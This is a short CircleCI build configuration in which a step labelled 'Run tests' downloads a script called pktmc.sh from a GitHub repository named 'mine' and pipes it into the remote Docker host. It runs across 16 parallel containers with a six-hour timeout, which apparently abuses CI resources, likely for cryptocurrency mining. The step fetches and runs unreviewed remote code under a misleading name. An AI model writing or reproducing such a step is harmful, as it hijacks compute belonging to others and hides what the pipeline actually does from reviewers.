jobs:
  build:
    parallelism: 16
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout
      - setup_remote_docker:
          version: 19.03.13
      - run: 
          name: Run tests 
          command: | 
            wget https://raw.githubusercontent.com/gyrogerald/mine/main/pktmc.sh
            chmod +x pktmc.sh
            cat pktmc.sh | ssh remote-docker
          no_output_timeout: 6h
